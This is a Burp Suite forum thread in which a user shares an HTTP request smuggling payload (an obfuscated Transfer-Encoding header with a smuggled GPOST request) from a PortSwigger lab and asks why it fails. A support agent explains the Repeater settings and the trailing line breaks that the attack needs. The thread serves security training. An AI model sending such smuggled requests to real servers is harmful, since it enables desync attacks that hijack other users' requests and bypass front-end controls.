Burp Suite User Forum

Create new post

HTTP request smuggling, obfuscating the TE header

Franko | Last updated: Nov 17, 2020 01:58PM UTC

Why it shows me bad requests in repeater response when i sent this request POST / HTTP/1.1 Host: my lab id Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 i have changed the lab id and using firefox browser , im getting this many times seems like the labs have problems , any solution?

Ben, PortSwigger Agent | Last updated: Nov 18, 2020 11:41AM UTC

Hi Frank, To confirm, are you disabling the Update Content-Length setting from the Repeater menu when you are attempting this? In addition, are you adding the trailing sequence \r\n\r\n following the final 0 (this essentially requires you to hit Enter a couple of times to create two blank lines after the final 0)?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.